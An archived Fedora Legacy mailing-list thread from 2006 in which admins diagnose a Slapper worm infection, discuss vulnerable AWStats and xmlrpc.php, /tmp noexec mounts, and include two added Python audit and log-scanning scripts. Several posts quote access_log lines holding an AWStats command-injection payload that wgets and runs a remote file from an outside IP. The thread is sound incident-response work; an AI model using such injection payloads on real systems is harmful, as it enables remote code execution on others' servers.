Re: slapper worm
On 2006-01-24 08:46:24 +1000, Michael Mansour wrote:
> > More generally, I read advice somewhere that mounting /tmp with the noexec option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult.

This doesn't really prevent execution of programs on /tmp, it just makes it more difficult. It is useful against worms which don't expect /tmp to be mounted noexec, though. (In other words: It works as long as only a few people use this trick)

> Definitely noted as one of the measures to stop this type of attack, but for this particular server, /tmp is not a mounted filesystem but part of /, so I can't really do that without re-partitioning the disk and creating a dedicated /tmp.

You could put /tmp on a tmpfs:

/etc/fstab:
none /tmp tmpfs noexec 0 0

        hp

--
   _  | Peter J. Holzer    | If I wanted to be academically correct,
|_|_) | Sysadmin WSR       | I'd be programming in Java.
| |   | [EMAIL PROTECTED]  | I don't, and I'm not.
__/   | http://www.hjp.at/ |   -- Jesse Erlbaum on dbi-users

--
fedora-legacy-list mailing list
fedora-legacy-list@redhat.com
https://www.redhat.com/mailman/listinfo/fedora-legacy-list
Re: slapper worm
Hi Peter,

> On 2006-01-24 08:46:24 +1000, Michael Mansour wrote:
> > > More generally, I read advice somewhere that mounting /tmp with the noexec option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult.
>
> This doesn't really prevent execution of programs on /tmp, it just makes it more difficult. It is useful against worms which don't expect /tmp to be mounted noexec, though. (In other words: It works as long as only a few people use this trick)
>
> > Definitely noted as one of the measures to stop this type of attack, but for this particular server, /tmp is not a mounted filesystem but part of /, so I can't really do that without re-partitioning the disk and creating a dedicated /tmp.
>
> You could put /tmp on a tmpfs:
>
> /etc/fstab:
> none /tmp tmpfs noexec 0 0

That's actually a very good idea, I forgot about that. But I thought it was more like:

/dev/shm /tmp tmpfs noexec,size=512M,mode=777 0 0

ie. I'd have to use the /dev/shm device instead of none ?

Actually, I forgot whether the tmpfs automatically adds the sticky bit on /tmp, or would I need to change the mode to 1777 ?

Michael.
Re: slapper worm
On 2006-01-24 22:13:26 +1000, Michael Mansour wrote:
> Hi Peter,
>
> > On 2006-01-24 08:46:24 +1000, Michael Mansour wrote:
> > > Definitely noted as one of the measures to stop this type of attack, but for this particular server, /tmp is not a mounted filesystem but part of /, so I can't really do that without re-partitioning the disk and creating a dedicated /tmp.
> >
> > You could put /tmp on a tmpfs:
> >
> > /etc/fstab:
> > none /tmp tmpfs noexec 0 0
>
> That's actually a very good idea, I forgot about that. But I thought it was more like:
>
> /dev/shm /tmp tmpfs noexec,size=512M,mode=777 0 0
>
> ie. I'd have to use the /dev/shm device instead of none ?

The device is ignored for filesystems which don't really use any device (like proc, sys, tmpfs, etc.). It might be a good idea to use a more descriptive string than none, though.

> Actually, I forgot whether the tmpfs automatically adds the sticky bit on /tmp, or would I need to change the mode to 1777 ?

The default mode is 1777. If you explicitly set the mode to 777, the sticky bit isn't set.

        hp
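The points Peter makes here (is /tmp its own mount, does it carry noexec, and does a tmpfs mode keep the sticky bit, which is the kernel default of 1777 unless mode= overrides it) can be checked mechanically. The following Python script is an added example and is not code from this thread: it parses /proc/mounts or fstab-style lines (the first four fields are the same in both), reports the effective tmpfs mode, and lists what is missing. The constructed sample lines, the function names and the extra nosuid/nodev checks are this example's own assumptions, not something the thread states.

```python
"""Audit how /tmp is mounted: separate filesystem, noexec, and (for tmpfs) the sticky bit."""
import os

# Constructed sample in /proc/mounts format (device mountpoint fstype options dump pass);
# /etc/fstab lines have the same first four fields, so both can be fed to audit_tmp().
SAMPLE_MOUNTS = """\
/dev/sda1 / ext3 rw 0 0
none /proc proc rw 0 0
tmpfs /tmp tmpfs rw,noexec,nosuid,nodev 0 0
"""

TMPFS_DEFAULT_MODE = 0o1777   # kernel default for a tmpfs root when no mode= option is given


def parse_mounts(text):
    """Map mountpoint -> {device, fstype, options}; a later line for the same mountpoint wins."""
    mounts = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):   # skip blank lines and fstab comments
            continue
        fields = line.split()
        if len(fields) < 4:
            continue
        device, mountpoint, fstype, options = fields[:4]
        mounts[mountpoint] = {"device": device, "fstype": fstype,
                              "options": options.split(",")}
    return mounts


def tmpfs_mode(options):
    """Effective permission bits of a tmpfs root: the mode= option (octal) or the default 1777."""
    for opt in options:
        if opt.startswith("mode="):
            return int(opt[len("mode="):], 8)
    return TMPFS_DEFAULT_MODE


def audit_tmp(text, path="/tmp"):
    """Return a dict describing how `path` is mounted plus a list of hardening findings."""
    entry = parse_mounts(text).get(path)
    if entry is None:
        # Michael's situation: /tmp lives on the root filesystem, so mount options can't target it.
        return {"separate_mount": False, "noexec": False, "sticky": None,
                "findings": [f"{path} is not a separate mount; noexec cannot be applied to it alone"]}
    opts = entry["options"]
    findings = []
    noexec = "noexec" in opts
    if not noexec:
        findings.append("missing noexec")
    for want in ("nosuid", "nodev"):          # usual companions of noexec (beyond what the thread covers)
        if want not in opts:
            findings.append(f"missing {want}")
    sticky = None                              # unknown for non-tmpfs; check the directory with stat(1)
    if entry["fstype"] == "tmpfs":
        mode = tmpfs_mode(opts)
        sticky = bool(mode & 0o1000)           # the sticky bit is the 01000 bit of the mode
        if not sticky:
            findings.append(f"mode={mode:o} drops the sticky bit; use mode=1777 (or omit mode=)")
    return {"separate_mount": True, "fstype": entry["fstype"], "noexec": noexec,
            "sticky": sticky, "findings": findings}


if __name__ == "__main__":
    # On a Linux host read the live mount table; elsewhere fall back to the constructed sample.
    text = open("/proc/mounts").read() if os.path.exists("/proc/mounts") else SAMPLE_MOUNTS
    print(audit_tmp(text))
```

Feeding it Michael's proposed line (mode=777) reports the dropped sticky bit, while Peter's line (no mode= at all) passes, which is exactly the difference Peter describes.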
Re: slapper worm
Michael Mansour wrote:
> Hi Marc,
>
> > On Tue, 2006-01-24 at 08:42 +1000, Michael Mansour wrote:
> > > No I'm not sure. Reading through the link above, it does seem that you've hit the nail on the head with this one. I have two other FC1 machines and they weren't affected by Slapper (even when the 3rd one was). The FC1 machine that was, had the xmlrpc.php file which I've now removed.
> >
> > Hi Michael,
> >
> > Do you know what installed the xmlrpc.php file? Was it something that came with FC1, or was it something you installed yourself? I'm just trying to make sure Fedora Legacy has everything covered.
>
> It came from Drupal.
>
> Michael.

That sounds like the xmlrpc exploit for the pear library. I got hit by that a few months ago. I was running b2evolution, but drupal was affected as well. My host was a FC4 box with all updates in place (w/mod_security and selinux enabled). I had to rebuild because I wasn't sure the box was compromised, but it was vulnerable (the exploit worked) and it was under attack.

Jason
Re: slapper worm
Jesse Keating wrote:
> On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote:
> > My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet.
>
> Do you have a CVE for the ssl issue? I'd like to see if it is somewhere in the QA pipeline.

Jesse,

Just checked this morning.
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=175406

But, I think we may need to do something proactively... I'm seeing many posting either not knowing about this worm or not knowing if they are protected or how vulnerable they may be. Many use (or are using) WebAdmin for simple configuration or installing other software making them more vulnerable. My FC1 box was not vulnerable, only because I like to use the command line and edit files manually instead of by web-pages.

What we need is a comprehensive fix to prevent all this from happening unknowingly to the users. Or a way of checking before they get infected.

James
Re: slapper worm
James Kosin wrote:
> Jesse Keating wrote:
> > On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote:
> > > My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet.
> >
> > Do you have a CVE for the ssl issue? I'd like to see if it is somewhere in the QA pipeline.
>
> Jesse,
>
> Just checked this morning.
> https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=175406
>
> But, I think we may need to do something proactively... I'm seeing many posting either not knowing about this worm or not knowing if they are protected or how vulnerable they may be.
[snip]

I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago?

Mike

--
p="p=%c%s%c;main(){printf(p,34,p,34);}";main(){printf(p,34,p,34);}
This message made from 100% recycled bits.
You have found the bank of Larn.
I can explain it for you, but I can't understand it for you.
I speak only for myself, and I am unanimous in that!
Re: slapper worm
On Tuesday 24 January 2006 13:08, Mike McCarty wrote:
> I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago?

Read the link I posted yesterday, according to them, it's been rewritten to exploit new ways to get in to your box.

http://www.lurhq.com/slapperv2.html

Regards, Mike Klinke
Re: slapper worm
On Tue, 2006-01-24 at 13:20 -0600, Mike Klinke wrote:
> On Tuesday 24 January 2006 13:08, Mike McCarty wrote:
> > I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago?
>
> Read the link I posted yesterday, according to them, it's been rewritten to exploit new ways to get in to your box.
>
> http://www.lurhq.com/slapperv2.html

This exploit can be managed. Please see http://www.modsecurity.org/

Apparently, this is known and requires updating of xmlrpc.php libraries.

--
G. Roderick Singleton [EMAIL PROTECTED]
PATH tech
Re: slapper worm
Mike McCarty wrote:
> Gene Heskett wrote:
> > On Tuesday 24 January 2006 14:20, Mike Klinke wrote:
> > > On Tuesday 24 January 2006 13:08, Mike McCarty wrote:
> > > > I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago?
> > >
> > > Read the link I posted yesterday, according to them, it's been rewritten to exploit new ways to get in to your box.
> > >
> > > http://www.lurhq.com/slapperv2.html
> >
> > If this file mentioned on the site doesn't exist on any of my systems, is it safe to assume relative safety against this attack? I would think so when combined with the ISP's (vz) blocking of port 80, but what do I know... That's why I asked, Mike.
>
> I suppose you mean Mike Klinke and not Mike McCarty :-)
>
> I dunno. I just ran
>
> # find / -nmae xmlrpc.php -print

What I get for typing that in instead of cut and paste. Of course, that was name not nmae.

Mike
Re: slapper worm
Mike McCarty wrote:
--snip--
> $ ps -A | grep pache
> $ ps -A | grep ssl
>
> doesn't show anything, so Apache isn't running, and I guess SSL isn't either.
>
> Mike

Mike,

ps -A | grep httpd
/* Apache is only the name of the server, not the rpm or application running */

SSL is a module of apache that allows SSL connections. The actual name of the module is mod_ssl and it is usually enabled in the default apache configuration for redhat/fedora.

James
Re: slapper worm
Hi Mike,

> > You should do a netstat -na | grep SYN, if you see a lot of those then slapper is there DOS attacking people.
>
> $ netstat -na | grep SYN
> $
>
> Thanks for the advice. But, as I am behind a stealth firewall, I feel relatively secured against *this* type of attack.
>
> Umm, what does there DOS attacking people? I had problems parsing that.

I should have written it DoS, stands for Denial of Service.

Michael.
Re: slapper worm
On Tuesday 24 January 2006 14:00, Gene Heskett wrote:
> If this file mentioned on the site doesn't exist on any of my systems, is it safe to assume relative safety against this attack?

As Michael Mansour discovered, he had this file on only one of three FC1 machines after he installed Drupal, a content management package. If you don't have it on your system you should be fine from this particular attack (also note the comments about the Awstats package in the link I sent).

Regards, Mike Klinke
Re: slapper worm
that's a coincidence... just today when i checked the apache server-status page i noticed that some host was scanning several sites randomly trying to find a xmlrpc.php in different apparently pre-defined locations. i was aware of the xmlrpc bug in pear and already checked if it was on my server but it wasn't... to make sure i immediately ran a locate and find again and nothing came up... also blocked the source ip and since then everything is quiet again. so i guess this so called slapper is still very active.

> From: Mike McCarty [EMAIL PROTECTED]
> Reply-To: Discussion of the Fedora Legacy Project fedora-legacy-list@redhat.com
> To: Discussion of the Fedora Legacy Project fedora-legacy-list@redhat.com
> Subject: Re: slapper worm
> Date: Tue, 24 Jan 2006 13:08:52 -0600
>
> James Kosin wrote:
> > Jesse Keating wrote:
> > > On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote:
> > > > My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet.
> > >
> > > Do you have a CVE for the ssl issue? I'd like to see if it is somewhere in the QA pipeline.
> >
> > Jesse,
> >
> > Just checked this morning.
> > https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=175406
> >
> > But, I think we may need to do something proactively... I'm seeing many posting either not knowing about this worm or not knowing if they are protected or how vulnerable they may be.
> [snip]
>
> I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago?
>
> Mike
Re: slapper worm
On Tuesday 24 January 2006 15:18, Mike McCarty wrote:
> Gene Heskett wrote:
> > On Tuesday 24 January 2006 14:20, Mike Klinke wrote:
> > > On Tuesday 24 January 2006 13:08, Mike McCarty wrote:
> > > > I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago?
> > >
> > > Read the link I posted yesterday, according to them, it's been rewritten to exploit new ways to get in to your box.
> > >
> > > http://www.lurhq.com/slapperv2.html
> >
> > If this file mentioned on the site doesn't exist on any of my systems, is it safe to assume relative safety against this attack? I would think so when combined with the ISP's (vz) blocking of port 80, but what do I know... That's why I asked, Mike.
>
> I suppose you mean Mike Klinke and not Mike McCarty :-)

Well (chuckle), I was replying to Mike Klinke, but anyone who knows the answer is welcome to chime in with their 2 cents.

> I dunno. I just ran
>
> # find / -nmae xmlrpc.php -print
>
> and didn't come up with anything. But that's expected, since I run behind a router set up as a firewall, completely stealth except for the e-mail challenge port (which is closed). A
>
> $ ps -A | grep pache
> $ ps -A | grep ssl
>
> doesn't show anything, so Apache isn't running, and I guess SSL isn't either.
>
> Mike

IIRC the httpd is running on that box as I used localhost:631 to configure cups not too long ago, which reminds me, I need to redo that because I've traded gutenprint-5.0.0beta2 for gutenprint-5.0.0-rc2 on this, the print server. But that's a RH7.3 box so the apache is a 1.3.something, but up to date AFAIK.

--
Cheers, Gene
People having trouble with vz bouncing email to me should add the word 'online' between the 'verizon', and the dot which bypasses vz's stupid bounce rules. I do use spamassassin too. :-)
Yahoo.com and AOL/TW attorneys please note, additions to the above message by Gene Heskett are:
Copyright 2005 by Maurice Eugene Heskett, all rights reserved.
Re: slapper worm
On Tuesday 24 January 2006 15:29, Mike McCarty wrote:
> Mike McCarty wrote:
> > Gene Heskett wrote:
> > > On Tuesday 24 January 2006 14:20, Mike Klinke wrote:
> > > > On Tuesday 24 January 2006 13:08, Mike McCarty wrote:
> > > > > I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago?
> > > >
> > > > Read the link I posted yesterday, according to them, it's been rewritten to exploit new ways to get in to your box.
> > > >
> > > > http://www.lurhq.com/slapperv2.html
> > >
> > > If this file mentioned on the site doesn't exist on any of my systems, is it safe to assume relative safety against this attack? I would think so when combined with the ISP's (vz) blocking of port 80, but what do I know... That's why I asked, Mike.
> >
> > I suppose you mean Mike Klinke and not Mike McCarty :-)
> >
> > I dunno. I just ran
> >
> > # find / -nmae xmlrpc.php -print
>
> What I get for typing that in instead of cut and paste. Of course, that was name not nmae.

Chuckle. A classic example of hindsight being 20-10 or better. It happens to the best of us.

> Mike

--
Cheers, Gene
Re: slapper worm
Michael Mansour wrote:
> Hi guys,
>
> I have an FC1 machine which got infected twice with the slapper worm, and then started DOS attacking a large vendor.
>
> I've stopped slapper in its tracks with a couple of changes to FC1, but in analysing now how it got in (it seems to use SSLv2 vulnerabilities in an apache SSL server which I've now turned off), I see the following bit of interest in my apache access_log:
>
> 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
>
> These scripz files end up going into /tmp, being compiled with gcc, renamed to httpd and run as that.
>
> I'm using:
>
> perl-5.8.3-17.4.legacy
> httpd-2.0.51-1.9.legacy
> openssl-0.9.7a-33.13.legacy
>
> Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine?
>
> Michael.

Michael,

Try my version of httpd here: http://support.intcomgrp.com/~jkosin

It has been effective against the worm so far.

James Kosin
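The access_log entries quoted above, and the xmlrpc.php scanning described earlier in the thread, are both easy to spot mechanically. As an added example (not code from the thread or from any of the projects it mentions), the Python script below parses Apache combined-format lines, URL-decodes the configdir= value passed to awstats.pl and flags shell metacharacters in it, flags requests for xmlrpc.php, and uses the status code to separate refused probes (the 403/404 in Michael's log) from requests the server actually answered with 200. The log lines, the source IPs (documentation ranges) and the download host are constructed for this example; the function names are this example's own.

```python
"""Flag AWStats configdir command-injection attempts and xmlrpc.php probes in Apache combined logs."""
import re
from urllib.parse import urlsplit, unquote

# Apache combined log format, the format of the access_log lines quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Characters that have no business in a configdir value; the thread's payload wraps a command in '|'.
SHELL_META = re.compile(r"[|;`$]")

# Constructed sample lines (documentation-range IPs and download host, not real hosts) in the
# shape of the thread's entries: two refused probes, an xmlrpc.php probe, one request answered
# with 200, and two benign requests.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198%2e51%2e100%2e7%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '192.0.2.10 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198%2e51%2e100%2e7%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '192.0.2.11 - - [24/Jan/2006:10:02:15 +1100] "GET /xmlrpc.php HTTP/1.0" 404 296 "-" "-"',
    '192.0.2.12 - - [24/Jan/2006:10:05:41 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198%2e51%2e100%2e7%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.5 - - [24/Jan/2006:10:03:00 +1100] "GET /awstats/awstats.pl?config=example.org HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.6 - - [24/Jan/2006:10:04:00 +1100] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it doesn't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def configdir_values(query):
    """Yield URL-decoded configdir= values. The query is split on '&' only, because the
    injected value itself contains ';' (as in the thread's log) and must stay in one piece."""
    for param in query.split("&"):
        name, _, value = param.partition("=")
        if name == "configdir":
            yield unquote(value)


def classify(line):
    """Return a finding dict for a suspicious request, or None for lines that look benign."""
    rec = parse_line(line)
    if rec is None:
        return None
    url = urlsplit(rec["target"])
    findings = []
    if url.path.endswith("awstats.pl"):
        for value in configdir_values(url.query):
            if SHELL_META.search(value):
                findings.append(("awstats-configdir-injection", value))
    if url.path.endswith("xmlrpc.php"):
        findings.append(("xmlrpc.php-probe", url.path))
    if not findings:
        return None
    # 403/404 (as in the thread) means the script was refused or absent: a probe, not a hit.
    # 200 means awstats.pl ran with the injected value and the host needs forensic attention.
    return {"ip": rec["ip"], "time": rec["ts"], "status": rec["status"],
            "executed": rec["status"] == 200, "findings": findings}


def scan(lines):
    """Classify every line and return the suspicious ones in log order."""
    return [hit for hit in map(classify, lines) if hit is not None]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["status"], "EXECUTED" if hit["executed"] else "probe", hit["findings"])
```

Run against a real access_log with `scan(open("/var/log/httpd/access_log"))`; anything reported with executed=True is the case Kelson distinguishes from "just probes", and is where to start looking for the /tmp artifacts Michael describes.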
Re: slapper worm
Hi James,

> Michael Mansour wrote:
> > Hi guys,
> >
> > I have an FC1 machine which got infected twice with the slapper worm, and then started DOS attacking a large vendor.
> >
> > I've stopped slapper in its tracks with a couple of changes to FC1, but in analysing now how it got in (it seems to use SSLv2 vulnerabilities in an apache SSL server which I've now turned off), I see the following bit of interest in my apache access_log:
> >
> > 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> > 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> >
> > These scripz files end up going into /tmp, being compiled with gcc, renamed to httpd and run as that.
> >
> > I'm using:
> >
> > perl-5.8.3-17.4.legacy
> > httpd-2.0.51-1.9.legacy
> > openssl-0.9.7a-33.13.legacy
> >
> > Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine?
> >
> > Michael.
>
> Michael,
>
> Try my version of httpd here: http://support.intcomgrp.com/~jkosin
>
> It has been effective against the worm so far.

Thanks, I will actually try them out today.

Have you considered making a yum/apt repo for your packages? It'll make it much easier to yum to newer releases when you have them, and it's quite easy to make a yum/apt repo.

Michael.
Re: slapper worm
On Mon, 2006-01-23 at 15:42 -0500, James Kosin wrote:
> Michael,
>
> Try my version of httpd here: http://support.intcomgrp.com/~jkosin
>
> It has been effective against the worm so far.

James, what is in your package that we haven't included in our Apache? I was under the assumption that we had fixed all the CVEs related to the slapper worm and that our users were safe. If this isn't the case, we have a severe problem and need to fix this immediately.

--
Jesse Keating RHCE (geek.j2solutions.net)
Fedora Legacy Team (www.fedoralegacy.org)
GPG Public Key (geek.j2solutions.net/jkeating.j2solutions.pub)
Re: slapper worm
Michael Mansour wrote:
> 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
...
> Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine?

You might also want to make sure you're using a current version of AWStats. IIRC this flaw was fixed in either 6.3 or 6.4, and the current version is 6.5. (If you don't have awstats.pl on your system, then these lines are just probes and aren't relevant to your problem.)

More generally, I read advice somewhere that mounting /tmp with the noexec option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult.

--
Kelson Vibber
SpeedGate Communications www.speed.net
Re: slapper worm
Jesse Keating wrote:
> James, what is in your package that we haven't included in our Apache? I was under the assumption that we had fixed all the CVEs related to the slapper worm and that our users were safe. If this isn't the case, we have a severe problem and need to fix this immediately.

Jesse,

Hi. I think it was fixed with the updates to perl by the update. But, that said, he could have a WebAdmin install that makes him vulnerable again. My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet. My version does add the mod_security module to Apache which should help with this and other worms that try to access via this type of method.

James
Re: slapper worm
Hi Kelson,

> Michael Mansour wrote:
> > 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> > 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> ...
> > Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine?
>
> You might also want to make sure you're using a current version of AWStats. IIRC this flaw was fixed in either 6.3 or 6.4, and the current version is 6.5.

Yeah, I run awstats 6.5 on that system.

> (If you don't have awstats.pl on your system, then these lines are just probes and aren't relevant to your problem.)
>
> More generally, I read advice somewhere that mounting /tmp with the noexec option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult.

Definitely noted as one of the measures to stop this type of attack, but for this particular server, /tmp is not a mounted filesystem but part of /, so I can't really do that without re-partitioning the disk and creating a dedicated /tmp.

Thanks.

Michael.
Re: slapper worm
On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote:
> My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet.

Do you have a CVE for the ssl issue? I'd like to see if it is somewhere in the QA pipeline.

--
Jesse Keating RHCE (geek.j2solutions.net)
Fedora Legacy Team (www.fedoralegacy.org)
Re: slapper worm
On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote:
> I'm using:
>
> perl-5.8.3-17.4.legacy
> httpd-2.0.51-1.9.legacy
> openssl-0.9.7a-33.13.legacy
>
> Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine?

What version of php are you running?

Marc.
Re: slapper worm
Hi Marc,

> On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote:
> > I'm using:
> >
> > perl-5.8.3-17.4.legacy
> > httpd-2.0.51-1.9.legacy
> > openssl-0.9.7a-33.13.legacy
> >
> > Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine?
>
> What version of php are you running?

php-4.3.11-1.fc1.3.legacy

Michael.
Re: slapper worm
Hi Marc,

> On Tue, 2006-01-24 at 08:42 +1000, Michael Mansour wrote:
> > No I'm not sure. Reading through the link above, it does seem that you've hit the nail on the head with this one. I have two other FC1 machines and they weren't affected by Slapper (even when the 3rd one was). The FC1 machine that was, had the xmlrpc.php file which I've now removed.
>
> Hi Michael,
>
> Do you know what installed the xmlrpc.php file? Was it something that came with FC1, or was it something you installed yourself? I'm just trying to make sure Fedora Legacy has everything covered.

It came from Drupal.

Michael.
Re: slapper worm
On Monday 23 January 2006 14:32, Michael Mansour wrote:
> 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
>
> These scripz files end up going into /tmp, being compiled with gcc, renamed to httpd and run as that.
>
> I'm using:
>
> perl-5.8.3-17.4.legacy
> httpd-2.0.51-1.9.legacy
> openssl-0.9.7a-33.13.legacy
>
> Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine?
>
> Michael.

Are you sure it's using an SSL exploit?

http://www.lurhq.com/slapperv2.html

Regards, Mike Klinke